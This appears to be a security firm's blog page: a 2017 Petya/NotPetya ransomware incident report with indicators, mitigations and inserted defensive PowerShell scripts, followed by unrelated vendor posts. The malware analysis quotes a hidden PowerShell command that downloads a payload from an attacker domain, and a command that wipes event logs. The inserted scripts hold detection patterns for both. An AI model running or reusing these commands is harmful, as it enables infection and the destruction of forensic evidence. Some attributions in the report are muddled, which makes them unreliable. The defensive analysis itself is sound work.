vSOC Spot Report – Petya – Ransomware Attack

Latest Updates

2017-06-27 18:31 EDT

As details continue to come in, there is evidence that today’s ransomware outbreak was actually two different campaigns that occurred at the same time. Some of the indicators originally attributed to the Petya malware actually belong to the second campaign, which is aptly being called NotPetya.

Exploitation of CVE-2017-0199, the myguy.xls file attachment, and the french-cooking[.]com domain name are all related to the NotPetya/Loki campaign, which was a different kind of attack aimed at banking institutions.

GuidePoint’s vSOC reported on the Petya ransomware incident as events were unfolding. Because our goal was to report accurate information in a timely manner, some of the original information included in our SPOT report and blog post actually belonged to the NotPetya/Loki campaign that was running simultaneously and was misattributed to Petya. The difference between these two campaigns was not known or understood initially. We have made every attempt to update this blog post with accurate information as it has become available.

2017-06-27 17:55 EDT

Several security researchers have identified a method of preventing the encryption of the disk: use any available method or technology to prevent C:\windows\perfc.dat from being written to disk or executed. This does not stop the spread of the malware; it only halts the encryption functions.
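As an added example, not taken from the vSOC report: a PowerShell script that applies the file-based block described above on a single host by creating the file and marking it read-only. It assumes an elevated PowerShell session on the affected Windows build. perfc.dat is the name given above; the two extra names (perfc and perfc.dll) are included because other published vaccine scripts of the time created them as well, and they are harmless if unneeded.

```powershell
#Requires -RunAsAdministrator
# Added example (not part of the vSOC report): create read-only placeholder files so the
# malware's own copy cannot be written to C:\Windows. This only blocks the encryption
# stage on this host; it does nothing to stop propagation across the network.
$windir = $env:SystemRoot   # normally C:\Windows
# perfc.dat is the file named in the update above; perfc and perfc.dll follow other
# published vaccine scripts (assumption: harmless extras, not named on this page)
$names = @('perfc.dat', 'perfc', 'perfc.dll')

foreach ($name in $names) {
    $path = Join-Path $windir $name
    if (-not (Test-Path -LiteralPath $path)) {
        # Create an empty file; -Force is deliberately not used so an existing file is never truncated
        New-Item -ItemType File -Path $path | Out-Null
    }
    # Mark it read-only so an ordinary overwrite attempt fails
    Set-ItemProperty -LiteralPath $path -Name IsReadOnly -Value $true
    # Record the resulting attributes for the change log
    $attrs = (Get-Item -LiteralPath $path).Attributes
    Write-Output ("{0}: {1}" -f $path, $attrs)
}
```

For a fleet, the same steps belong in a GPO startup script or an endpoint-management job rather than being run by hand; the read-only attribute is a speed bump, not an access control, so it should be combined with the patching and share-hardening steps in the updates below.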

As of 1730 EDT, the email provider for the attacker’s wowsmith123456@posteo.net address has closed the account. This affects the ability to pay the ransom if you are infected; new variants may provide a new method of payment.

2017-06-27 15:31 EDT

The initial outbreak of the Petya ransomware has been correlated with compromised accounting software, MeDoc, which is popular with many large Ukrainian businesses as well as the Ukrainian Government. Attackers compromised the update code of a recent release, which helped propagate the ransomware to many different companies. The update was released at 10:30 AM GMT, about an hour before the initial surge of infections was observed.

2017-06-27 15:30 EDT

New information has been made available that provides further insight into how the Petya ransomware operates. If the permissions of the logged-in user are not sufficient to write to the Master Boot Record (MBR), the malware will instead encrypt files based on their extension, like more traditional ransomware.

The list of file types that are encrypted: 3ds, 7z, accdb, ai, asp, aspx, avhd, back, bak, c, cfg, conf, cpp, cs, ctl, dbf, disk, djvu, doc, docx, dwg, eml, fdb, gz, h, hdd, kdbx, mail, mdb, msg, nrg, ora, ost, ova, ovf, pdf, php, pmf, ppt, pptx, pst, pvi, py, pyc, rar, rtf, sln, sql, tar, vbox, vbs, vcb, vdi, vfd, vmc, vmdk, vmsd, vmx, vsdx, vsv, work, xls, xlsx, xvd, zip.

The malware also clears system security logs to hinder further analysis, using the command:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
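Clearing a log does not erase the record of the clearing itself, which is what a responder should look for. Below is an added example, not part of the vSOC report, of a PowerShell function that hunts for that residue on one host: the Security log receives event 1102 ("The audit log was cleared") and the System log receives event 104 for each log that was cleared, both written after the purge, and if process command-line auditing is enabled, Security event 4688 also captures the wevtutil/fsutil command line from the command above. The function name and its 24-hour default window are assumptions of this example.

```powershell
# Added example (not part of the vSOC report): hunt for traces of the log-clearing command.
# Requires a session that can read the Security log (normally an elevated session).
function Find-LogClearingEvidence {
    param([int]$Hours = 24)   # how far back to look (assumed default for this example)
    $since = (Get-Date).AddHours(-$Hours)

    # Events that record a log being cleared. SilentlyContinue because Get-WinEvent reports
    # "no events found" as an error rather than returning an empty result.
    $cleared = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102; StartTime = $since } -ErrorAction SilentlyContinue)
    $cleared += @(Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 104; StartTime = $since } -ErrorAction SilentlyContinue)

    # Process-creation events whose logged command line matches the command in the report
    $pattern = 'wevtutil(\.exe)?\s+cl\s|fsutil(\.exe)?\s+usn\s+deletejournal'
    $procs = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $pattern })

    # Emit one row per finding, oldest first, with the first line of the message as a summary
    foreach ($e in ($cleared + $procs | Sort-Object TimeCreated)) {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            EventId = $e.Id
            Log     = $e.LogName
            Summary = ($e.Message -split "`r?`n")[0]
        }
    }
}

# Typical use on a host under investigation
Find-LogClearingEvidence -Hours 48 | Format-Table -AutoSize
```

The fsutil USN-journal deletion leaves no event of its own, so the 4688 match (or a Sysmon process-creation event, if deployed) is the only direct trace of that part of the command; the 1102/104 events remain the most reliable signal because they are generated by the event log service itself. Forwarding logs to a collector before they can be cleared is the durable fix.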

To further protect vulnerable systems, it is advised to disallow execution of psexec.exe if it is not needed, or to prevent non-privileged users from executing psexec.exe via GPO or other endpoint mechanisms.

2017-06-27 15:20 EDT

Blocking lateral movement of the Petya variants of ransomware can be achieved by patching the EternalBlue vulnerability (Microsoft’s Critical Security Bulletin MS17-010) and by disabling administrative shares via a Group Policy Object (GPO). To disable ADMIN$ shares, use the following process:

Create a file named adminshares.adm with the content below under C:\windows\inf on the server you edit your GPOs with.

CLASS MACHINE
CATEGORY !!category1
  CATEGORY !!category2
    POLICY !!policyname
      EXPLAIN !!DefaultSharesExplain
      KEYNAME "System\CurrentControlSet\Services\LanManServer\Parameters\"
      VALUENAME "AutoShareWks"
      VALUEON NUMERIC 1
      VALUEOFF NUMERIC 0
    END POLICY
  END CATEGORY
END CATEGORY

[strings]
category1="Network"
category2="Sharing"
policyname="AdministrativeShares"
DefaultSharesExplain="Enables default workstation administrative shares if enabled or disables if disabled"

Next, create a new GPO, right-click Administrative Templates, and add the administrative template you just created.

Click Machine Administrative Templates, go into View > Filtering, and uncheck “Only show policy settings that can be fully managed” (the setting is shown in the top picture). This allows the GPO Editor to show settings that are outside the default registry “policies” area, like ours. Any setting made outside the policy keys persists if the policy is removed, unlike standard policies.

Open Administrative Templates – Network – Sharing

Enable or disable administrative shares. With the template above, setting the AdministrativeShares policy to Disabled writes AutoShareWks = 0, which stops the default shares from being created; Enabled writes AutoShareWks = 1 and restores them.
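The GPO procedure above is the way to roll the setting out; for a single host, or to verify that the policy actually took effect, the same registry value can be set and checked directly. The following added example is not part of the vSOC report. AutoShareWks is the value named in the template (it governs workstation SKUs); AutoShareServer is its counterpart on server SKUs and is included here from general Windows knowledge, since the template as written does not cover it. The script assumes an elevated PowerShell session on Windows 8/Server 2012 or later (for the Smb* cmdlets) and finishes with a check of the SMBv1 exposure that MS17-010 addresses.

```powershell
#Requires -RunAsAdministrator
# Added example (not part of the vSOC report): apply and verify the AutoShare* values directly.
$key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'

# 0 = do not create the default administrative shares (ADMIN$, C$, ...) when the Server service starts.
# AutoShareServer is the server-SKU counterpart of AutoShareWks (not in the page's template).
foreach ($name in 'AutoShareWks', 'AutoShareServer') {
    Set-ItemProperty -Path $key -Name $name -Value 0 -Type DWord
}

# The Server service only re-reads these values when it starts; restarting it drops active SMB sessions
Restart-Service -Name LanmanServer -Force

# Verify the values and confirm the shares are gone (IPC$ remains; it is not controlled by these values)
Get-ItemProperty -Path $key | Select-Object AutoShareWks, AutoShareServer
$leftover = Get-SmbShare | Where-Object { $_.Name -in 'ADMIN$', 'C$' }
if ($leftover) {
    Write-Warning ('Administrative shares still present: ' + ($leftover.Name -join ', '))
} else {
    Write-Output 'ADMIN$ and C$ are no longer shared.'
}

# Lateral movement over EternalBlue needs SMBv1 on the target; report whether it is still enabled
$smb1 = (Get-SmbServerConfiguration).EnableSMB1Protocol
Write-Output ('SMBv1 server protocol enabled: {0}' -f $smb1)
if ($smb1) {
    Write-Warning 'SMBv1 is enabled; apply MS17-010 and disable SMBv1 where it is not required.'
}
```

Removing ADMIN$ also breaks legitimate remote administration that depends on it (psexec-style tools and some management agents), so test the change against your own tooling before applying it broadly. The registry value only suppresses automatic creation of the shares; an administrator can still create them by hand, which is why the GPO-enforced setting is preferable to a one-off script.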

2017-06-27 14:11 EDT

On Tuesday June 27, 2017, accounts of a new ransomware campaign named Petya or Petwrap, are making headlines as infections hit Kiev, Ukraine at approximately 11:30 GMT and continued to spread throughout Russia, Spain, France, UK, India, and various other countries in Europe. The Petya ransomware variant does not encrypt individual files on an infected machine like WCrypt0r from May 2017. Rather, Petya reboots the computer and overwrites the Master Boot Record (MBR) in the boot sector of the hard drive with its code demanding ransom. Without the MBR, the operating system has no directions for where to find the files it needs to boot and run. This effectively renders the entire computer useless until the ransom, $300 in Bitcoin, is paid.

Today’s Petya variant infects machines through a Microsoft Office vulnerability (CVE-2017-0199) and then moves laterally throughout the network exploiting the EternalBlue SMBv1 file-sharing protocol vulnerability as described in Microsoft’s Critical Security Bulletin MS17-010. Patching these vulnerabilities is imperative and will significantly reduce or eliminate the ability of this ransomware to impact your organization.

The Petya ransomware first appeared in early 2016, but the variant spreading through Europe and Russia today contains new code and new functions. Most notable is the use of the EternalBlue exploit to infect machines. This variant is an evolution that has combined new tactics and procedures made famous in other malware campaigns seen in 2017.

Notable companies affected by the Petya ransomware attack include (at the time of this writing):

  • Danish Shipping Company, Maersk
  • British Advertising Company, WPP
  • Russian Oil Company, Rosneft
  • Ukrainian Power Companies, Kyivenergo and Ukrenergo
  • Ukrainian Banks, National Bank of Ukraine (NBU) and Oschadbank
  • Ukrainian Mining Company, Evraz
  • Ukrainian Telecoms, Kyivstar, LifeCell, and Ukrtelecom
  • Ukrainian Nuclear Power Plant, Chernobyl

At the time of publishing this vSOC SPOT Report, there have been no confirmed active connections to any of the known indicators associated with this Petya malware variant from any vSOC subscriber network.

vSOC has obtained rules for CarbonBlack and CrowdStrike to detect this infection; vSOC Protect clients with either of these solutions are protected and monitored for the Petya variants of ransomware. vSOC Detect clients are also being monitored for all available indicators of the Petya variants by your vSOC team.

Technical Analysis

Petya’s rapid propagation is believed to be linked to the use of the same EternalBlue exploit that the WanaCrypt0r malware used in May 2017: attacks against the vulnerable SMBv1 file-sharing protocol. EternalBlue was released to the public after allegedly being stolen from the National Security Agency (NSA) in April 2017.

Current evidence shows that these attacks began with malicious spam emails weaponized to use the EternalBlue exploit for Microsoft Office vulnerability CVE-2017-0199 over TCP ports 445, 135, and potentially 1024-1035.

Malicious emails originate from IPs 84.200.16.242, 95.141.115.108, 111.90.139.247, 185.165.29.78 which the attackers have registered to the domains delightcaf[.]xyz, french-cooking[.]com and coffeeinoffice[.]xyz.

The malspam variant of this attack is predominantly coming from 84.200.16.242/myguy[.]xls and 185.165.29.78/myguy[.]xls. All traffic to the Command and Control (C2) servers is currently using HTTP as the communication protocol.

Early reports indicate the botnet distributing this malware originates from the LokiBot network. Also, additional reports state the Mischa ransomware package is included in the Petya PE, however confirmation is still forthcoming.

Latest Indicators of Compromise

2017-06-27 15:20 EDT

File Names

These files are all accessed by the runtime process WINWORD.EXE (PID 3008):

  • %APPDATA%\Microsoft\Office\Recent\Order-20062017.LNK
  • %APPDATA%\Microsoft\Office\Recent\index.dat
  • %APPDATA%\Microsoft\Templates\~$Normal.dotm
  • C:\~$der-20062017.doc@Please_Read_me@.txt
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\myguy[1].hta
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E328F26-90AD-432F-85D6-72D24D3FC842}.tmp
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C06767A-F061-47F9-B88B-16AA8AA0D1F2}.tmp

Command and Control (C2)

  • 84.200.16.242/myguy[.]xls
  • 185.165.29.78/myguy[.]xls

Memory Strings

  • !”#$%&'()*+,-./0123456789:;<=>
  • “$(*.046:<“j.x\
  • (\{9%EZ”B%]V\XR){y%JWbj3jiDN}~Hl:x7
  • )|xA:X+Zp@w>v)7#% M+ANqR#mXf,934 qx$}&
  • /myguy.xls
  • /n “C:\Order-20062017.doc”
  • 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}
  • 0000320a5802580201000400000000005202bc0220003600050000000902000000021c000000fb021000070000000000bc02000000000102022253797374656d0076f8032f0040311500bf05087640910b76fc7cb3044c311500040000002d010500040000002d01050004000000f0010300030000000000}{\result {
  • 1Pm\\9M2aD];Yt\[x]}Wr|]g-
  • 6iD_,|uZ^ty;!Y,}{C/h> PK ! dQ 1 word/_rels/document.xml.rels ( j0{-;@ $~

File Hash Values

  • 185.165.29.78
    • A809a63bc5e31670ff117d838522dc433f74bee
    • 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
    • bec678164cedea578a7aff4589018fa41551c27f
    • d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
    • aba7aa41057c8a6b184ba5776c20f7e8fc97c657
    • 0ff07caedad54c9b65e5873ac2d81b3126754aac
    • 51eafbb626103765d3aedfd098b94d0e77de1196
  • 84.200.16.242
    • 7ca37b86f4acc702f108449c391dd2485b5ca18c
    • 2bc182f04b935c7e358ed9c9e6df09ae6af47168
    • 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
    • 82920a2ad0138a2a8efc744ae5849c6dde6b435d

Binary Details

The binary is currently signed using a certificate from Sysinternals. This will give a Certificate Name Mismatch error; however, the binary will still run in Windows. The current samples attempt to hijack an authorized session in order to spread using psexec. Several of the samples show the lateral movement functions are utilizing Windows Management Instrumentation Command-line (WMIC). Both are avenues for the malware to gain either local or Domain Administrator privileges allowing it to spread using that level of credential.

The sample was compiled for the i386 architecture specifically but appears to be functional on x64 architecture as well.

The PE imports the following DLL files for proper execution:

  • ADVAPI32.dll
  • CRYPT32.dll
  • DHCPSAPI.DLL
  • IPHLPAPI.DLL
  • KERNEL32.dll
  • MPR.dll
  • NETAPI32.dll
  • SHELL32.dll
  • SHLWAPI.dll
  • USER32.dll
  • WS2_32.dll
  • msvcrt.dll
  • ole32.dll

PowerShell

The PE will attempt to execute the following script:

PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', '%APPDATA%\<random>.exe')

The <random> variable is a random number between 0 and 65535; the downloaded file is then called with the arguments 1 0 (for example, %APPDATA%\10254.exe 1 0).

Additional files dropped:

  • http[:]//185.165.29.78/~alex/svchost.exe
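The indicators in this section and the download cradle in the PowerShell section above can be folded into one sweep. The following is an added example, not part of the vSOC report, of a small PowerShell IoC check built only from the indicators listed on this page: it matches the C2 IPs, domains and URL paths against log lines, flags script-block text that resembles the hidden DownloadFile cradle, and looks in %APPDATA% for the <random>.exe drop described above, hashing anything it finds against the report's SHA-1 list. The sample log lines at the bottom are constructed for this example and are not real captures; the function names are assumptions. It assumes PowerShell 3 or later on Windows.

```powershell
# Added example (not part of the vSOC report): IoC sweep from the indicators on this page.

# Network indicators from the report, re-armed from their defanged form
$IocIPs      = @('84.200.16.242', '95.141.115.108', '111.90.139.247', '185.165.29.78')
$IocDomains  = @('delightcaf.xyz', 'french-cooking.com', 'coffeeinoffice.xyz')
$IocUrlPaths = @('/myguy.xls', '/myguy.exe', '/~alex/svchost.exe')
# SHA-1 hashes from the report, lower-cased. The first is printed with 39 hex digits on the
# page and is kept as printed; it cannot match a real 40-digit SHA-1.
$IocSha1 = @(
    'a809a63bc5e31670ff117d838522dc433f74bee',
    '078de2dc59ce59f503c63bd61f1ef8353dc7cf5f',
    'bec678164cedea578a7aff4589018fa41551c27f',
    'd5bf3f100e7dbcc434d7c58ebf64052329a60fc2',
    'aba7aa41057c8a6b184ba5776c20f7e8fc97c657',
    '0ff07caedad54c9b65e5873ac2d81b3126754aac',
    '51eafbb626103765d3aedfd098b94d0e77de1196',
    '7ca37b86f4acc702f108449c391dd2485b5ca18c',
    '2bc182f04b935c7e358ed9c9e6df09ae6af47168',
    '1b83c00143a1bb2bf16b46c01f36d53fb66f82b5',
    '82920a2ad0138a2a8efc744ae5849c6dde6b435d'
)
# The hidden download cradle from the PowerShell section, as a regex over script-block text
$CradlePattern = 'WindowStyle\s+Hidden.*System\.Net\.WebClient.*DownloadFile'

function Find-IocInLogLines {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        foreach ($ip in $IocIPs) {
            if ($line -match [regex]::Escape($ip)) {
                [pscustomobject]@{ Type = 'C2-IP'; Indicator = $ip; Line = $line }
            }
        }
        foreach ($domain in $IocDomains) {
            if ($line -match [regex]::Escape($domain)) {
                [pscustomobject]@{ Type = 'C2-Domain'; Indicator = $domain; Line = $line }
            }
        }
        foreach ($path in $IocUrlPaths) {
            if ($line -match [regex]::Escape($path)) {
                [pscustomobject]@{ Type = 'URL-Path'; Indicator = $path; Line = $line }
            }
        }
        if ($line -match $CradlePattern) {
            [pscustomobject]@{ Type = 'Download-Cradle'; Indicator = $CradlePattern; Line = $line }
        }
    }
}

function Find-DroppedPayload {
    # The report describes %APPDATA%\<random>.exe with <random> between 0 and 65535
    Get-ChildItem -Path $env:APPDATA -Filter '*.exe' -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match '^\d{1,5}\.exe$' -and [int]$_.BaseName -le 65535 } |
        ForEach-Object {
            $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA1).Hash.ToLower()
            [pscustomobject]@{ Path = $_.FullName; Sha1 = $hash; KnownHash = ($IocSha1 -contains $hash) }
        }
}

# Constructed sample lines (a proxy log and a PowerShell script-block log excerpt), not real captures
$sample = @(
    '2017-06-27T11:42:10Z proxy allow 10.0.0.15 -> 84.200.16.242 GET /myguy.xls',
    '2017-06-27T11:42:31Z proxy allow 10.0.0.15 -> french-cooking.com GET /myguy.exe',
    '2017-06-27T11:43:02Z 4104 ScriptBlockText: PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(...)',
    '2017-06-27T11:50:00Z proxy allow 10.0.0.22 -> 192.0.2.10 GET /index.html'
)
Find-IocInLogLines -Lines $sample | Format-Table -AutoSize
Find-DroppedPayload | Format-Table -AutoSize
```

A numbered-name executable in %APPDATA% whose hash is not on the list is still worth a look, since the report only captures the samples seen so far; the file-name pattern and the hidden-window cradle are the durable signals, and the cradle regex is best run against PowerShell script-block logging (event 4104), which records the decoded command even when it was launched from a document.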

Extortioner Contact Info:

Mitigation

vSOC recommends immediately patching the vulnerabilities described in CVE-2017-0199 and MS17-010. However, unlike the previous WCrypt0r ransomware, patching alone will not prevent the spread of this malware. Petya’s code will attempt to use a variety of methods to propagate itself, including the EternalBlue vulnerability, WMIC, and PowerShell.

vSOC recommends that organizations:

References:

The President’s Executive Order: Mapping products to cybersecurity Risk Management

In the previous three blogs, President Trump’s Executive Order. What agencies need to do to respond., Quick hit product categories that can boost executive agencies EO mandated NIST risk scores, and Addressing the EO stated greatest threat to agency cybersecurity posture, we laid out some strategies for federal agencies to respond to the President’s Executive Order (EO).  Finally, in this blog we list a variety of products and technologies that, if not already deployed, should be considered first when trying to move the needle in security posture.

First, the different technologies are listed here in the area they fit in EO Section 1 b (i):

Section 1 b (i) defined cybersecurity Risk Management product mapping:

– Protecting IT from unauthorized access
  • Information and access discovery
  • MFA
  • Privileged Access Encryption
  • Privileged Access monitoring and management
  • UBEA (user)
– Maintaining awareness of threats
  • Threat Intelligence feeds
  • Threat Intelligence Management system
  • Vulnerability scanning/monitoring
  • Vulnerability mapping/prioritization
– Detecting anomalies and incidents
  • Deception Technology for EARLY WARNING (Man, this is an easy one!)
  • EDR
  • NextGen AV
  • SIEM
  • UBEA (User, System and Network)
– Mitigating the impact of incidents through response and recovery
  • EDR
  • NAC

Next, we will list them in alphabetical order with brief explanations of what they do.  These are not ranked by importance or value.  We recognize that many organizations will probably have most of these deployed already, but none that we have experienced have all of them deployed.

Deception Technology for EARLY WARNING (TrapX, Attivo Networks) – (This is an easy one!)
Platform that deploys “fake” systems on the network, fake credentials on the end points, and carefully crafted logs in the administrative systems. The most advanced deception platforms weave a complex storyline designed to look like bread crumbs leading to sensitive information to attract/bait adversaries into revealing themselves. These platforms include alarms that send alerts to the SIEM or SOC directly once these systems and credentials are used. The most eye-opening thing about most deception platforms is the low price point for the simplest early warning system innovation. The value vs. cost is fantastic.

EDR (FireEye HX, Carbon Black, DigitalGuardian) – These solutions defend end points against advanced threats, detect active threats and compromise, and collect logs and data for response forensically when a threat or compromise is suspected.  The more advanced EDR products can pull detailed forensic information and quarantine systems actively under attack or already compromised. This is a must-have for any enterprise.

Multi-Factor Authentication (Duo, Okta, Google Authenticator) – Two-Factor Authentication (2FA) uses at least two of the three types of authentication: “What you know”, “What you have” and “Who you are”. Typically, this means a password plus a verified device or fingerprint. In the past, this was a costly and cumbersome security measure where key generators from tokens were bought and distributed. However, with the advent of smart phones, MFA can be created with a phone app that is verified as a secure second factor for a specific user. (NOTE: This is not SMS, which is no longer considered acceptable for MFA.)

NAC (ForeScout) – Manages asset access to the network by validating that a system is compliant with security policies. An example would be DoD “Comply2Connect”, where any system connecting to the network has to be thoroughly vetted and could be quarantined for further administration and clean up. It can also be used for quarantining a system that has been identified for investigation of attack or compromise.

NextGen AV (Cylance, Cb Protect) – Legacy AV, using signatures, stops unsophisticated attacks; NextGen AV uses math and heuristics to defend against more sophisticated attacks. The most prevalent example is polymorphic malware that changes its signature even after install. By using analytics on the files, malware can be detected even if the signature was created minutes ago.

Information and Access Discovery (Varonis) – These products can scan enterprises for sensitive data (e.g. PII or classified data) and report back all the known locations and who has access to them in the IdAM system. They can also lay out the past history of access and monitor for access and anomalous behavior in accessing sensitive data. In addition, these technologies help significantly in any IdAM, User-UBA or DLP deployment by cleaning up access and classification of data. Many times, access creep has corrupted security policy, or people who have access are not using it and should be removed unless they request it in the future. Without these steps, IdAM, User-UBA and DLP can be permanently crippled or take significant time to tune and become effective.

Privileged Access Encryption (Vormetric) – Solution that specifically prevents privileged accounts from accessing data directly. This is mitigation against the most common form of unauthorized access by adversaries. Once inside a network, attackers typically elevate privileges to administrator and try to access data directly. By encrypting data while still allowing administrators to administer systems, unauthorized users, even privileged users, cannot read important data.

Privileged Access Monitoring and Management (Varonis and CyberArk/Thycotic) – By controlling and monitoring privileged user access, a significant threat vector is closed. Even if a privileged user could not access data directly (see above), they could still create, or find and take over, a user account that does have access to the data and systems an adversary wants. Typically, privileged user account management solutions require access to be checked out in a highly controlled manner.

SIEM (Splunk, LogRhythm) – Security Information and Event Management consumes and correlates logs from the environment against pre-determined rules for security alerting.

Threat Intelligence Feeds – Both free and paid threat feeds supply adversary information to identify when an attack, attacker, or malicious file needs attention. Many organizations have paid subscriptions to threat feeds from different products in their environment; some also pay for high-fidelity threat feeds to augment them.

Threat Intelligence Management System (Anomali) – Threat Intelligence is the core of defending against attackers. Knowing which files, IP addresses and threat actor indicators to look for or block is key to the effectiveness of cyber security tools throughout a cyber infrastructure. By deploying a threat intelligence management platform, the highly valuable threat feeds, free and paid, can be deduplicated against each other, contextually aggregated for enrichment and distributed to the cyber tools.

UBA (User, System and Network)
– User (Exabeam): Analyzes logs of user activity from the standard IT infrastructure (such as IdAM/AD/LDAP), creates a baseline of activity and monitors for deviations from the baseline. This includes individual user behavioral changes and user deviations from the standard that a cohesive group creates, which may indicate an account that has been compromised. The most mature User-UBA will create a timeline of activity from a range of logs, including normal IT and security tools throughout the enterprise.
– System (Exabeam): Analyzes system logs from the IT infrastructure, creates a baseline of activity and monitors for deviations from the baseline. This System-UBA goes beyond signatures or correlations to known activities of attackers.
– Network: Analyzes network logs such as packets and netflow from IT infrastructure and security tools, creates a baseline of activity and monitors for deviations. Unlike IPS or NGFW, Network-UBA goes beyond signatures or correlations to known activities of attackers in the network. The most advanced will pull in logs from many resources across multiple disciplines.

Vulnerability Scanning/Monitoring (Tenable, TripWire) – Scans systems with or without agents on end points to monitor for vulnerabilities and changes to a system that may open it up to compromise.

Vulnerability Mapping/Prioritization (RedSeal) – Actively ingests network configuration data and vulnerability scanning logs to rank security threats identified by attack paths to vulnerable systems. The resulting risk scoring and details allow an enterprise to prioritize remediation by a risk score that is specific to its systems rather than a generic one-size-fits-all score.

If any of these intrigue your organization and you would like to know more, please contact us at federal@guidepointsecurity.com.

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security

With more than 18 years of experience in the Federal technology industry, Jean-Paul Bergeaux is currently the Federal CTO for GuidePoint Security. JP’s career has been marked by success in technical leadership roles with ADIC (now Quantum), NetApp and Commvault and SwishData. Jean-Paul focuses on identifying customers’ challenges and architecting innovative solutions to solve their complex problems. He is also a thought leader on topics that are top of mind for Federal IT Managers like Cyber Security, VDI, Big Data, and Backup & Recovery.

GuidePoint Security Achieves AWS Security Competency Status

HERNDON, VA – June 8, 2017 – GuidePoint Security announced today that it has achieved Security Competency Partner status with Amazon Web Services (AWS). This designation recognizes that GuidePoint has demonstrated deep expertise that helps its clients achieve their cloud security goals.

Becoming a Security Competency Partner differentiates GuidePoint as an AWS Partner Network (APN) member that provides specialized consulting services designed to help enterprises adopt, develop and deploy complex security projects on AWS. To receive the designation, APN Partners must possess deep expertise and experience on AWS.

AWS Competencies are only awarded to APN partners, like GuidePoint Security, that have demonstrated technical proficiency and proven customer success in specialized solution areas. GuidePoint Security is also an Authorized Government Partner and became an APN Advanced Consulting Partner in 2017.

“GuidePoint is proud to be one of the first APN partners to achieve Security Competency Partner status,” said Bryan Orme, Principal, Information Assurance. “As a security-focused consultancy, our team is dedicated to helping companies develop cloud security strategies and delivering cloud security solutions by combining our proven security expertise with the range of AWS security tools.”

The AWS Cloud is enabling scalable, flexible, and cost-effective solutions from startups to global enterprises. To support the seamless integration and deployment of these solutions, AWS established the Security Competency Program to help customers identify Consulting and Technology APN Partners with deep industry experience and expertise. In addition to general Cloud Security Architecture and Strategy services, GuidePoint provides architectural reviews specifically focused on AWS environments. GuidePoint’s cloud security architects and engineers work with our clients to understand their operational needs, assess their current security posture, and provide relevant, prioritized, and actionable remediation guidance and recommendations for further improvement.

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

GuidePoint Security Named to CRN’s 2017 Solution Provider 500 List

GuidePoint Security, of Herndon, Va. announced today that CRN®, a brand of The Channel Company, has named GuidePoint Security to its 2017 Solution Provider 500 list. The Solution Provider 500 is CRN’s annual ranking of the largest technology integrators, solution providers and IT consultants in North America by revenue.

The Solution Provider 500 is CRN’s predominant channel partner award list, serving as the industry standard for recognition of the most successful solution provider companies in the channel since 1995. This year, for the first time since 2010, the complete list will be published on CRN.com, making it readily available to vendors seeking out top solution providers to partner with.

CRN has also released its 2017 Solution Provider 500: Newcomers list, recognizing 58 companies making their debut in the Solution Provider 500 ranking this year.

“We’re really excited to be on this esteemed list again,” noted Founder and Managing Partner Michael Volk. “We’re even prouder of the fact GuidePoint moved up in rank, placing #134 for 2017. Providing the very best services and solutions to our customers has always been our number one priority,” Volk concluded.

“CRN’s Solution Provider 500 list spotlights the North American IT channel partner organizations that have earned the highest revenue over the past year, providing a valuable resource to vendors looking for top solution providers to partner with,” said Robert Faletra, CEO of The Channel Company. “The companies on this year’s list represent an incredible, combined revenue of over $318 billion, a sum that attests to their success in staying ahead of rapidly changing market demands. We extend our sincerest congratulations to each of these top-performing solution providers and look forward to their future pursuits and successes.”

The complete 2017 Solution Provider 500 list is available online at www.crn.com/sp500 and a sample from the list will be featured in the June issue of CRN Magazine.


About the Channel Company

The Channel Company enables breakthrough IT channel performance with our dominant media, engaging events, expert consulting and education, and innovative marketing services and platforms. As the channel catalyst, we connect and empower technology suppliers, solution providers and end users. Backed by more than 30 years of unequaled channel experience, we draw from our deep knowledge to envision innovative new solutions for ever-evolving challenges in the technology marketplace. www.thechannelco.com

Addressing the EO stated greatest threat to agency cybersecurity posture

The first blog in this GuidePoint Security series focused on how Federal agencies can address the President’s Executive Order. It was pointed out that in section 1 b (iv) the EO states:

(iv)  Known but unmitigated vulnerabilities are among the highest cybersecurity risks faced by executive departments and agencies (agencies).  Known vulnerabilities include using operating systems or hardware beyond the vendor’s support lifecycle, declining to implement a vendor’s security patch, or failing to execute security-specific configuration guidance.

Common Vulnerabilities and Exposures (CVEs) are published to notify organizations of issues that should be addressed. Typically, the CVE will issue guidance on mitigation by anything from a simple patch from the vendor, to disabling services until a patch is released. Sometimes the mitigation is difficult because of legacy End of Life’d (EoL) software. What the EO warning acknowledges is that many agencies are behind in completing these CVE mitigations.

It’s a scary fact, but it is easy to understand why. A typical vulnerability report includes hundreds to thousands of vulnerabilities that need mitigation. How does an organization quickly resolve all of them? Most organizations rely on prioritization strategies that result in a spreadsheet of the vulnerabilities in the order in which to resolve them. One of the ways agencies prioritize is by how these CVEs are graded by NIST as “Critical,” “High,” “Medium,” or “Low,” depending on factors like how easy the vulnerability is to execute against and how much access the vulnerability provides the attacker.

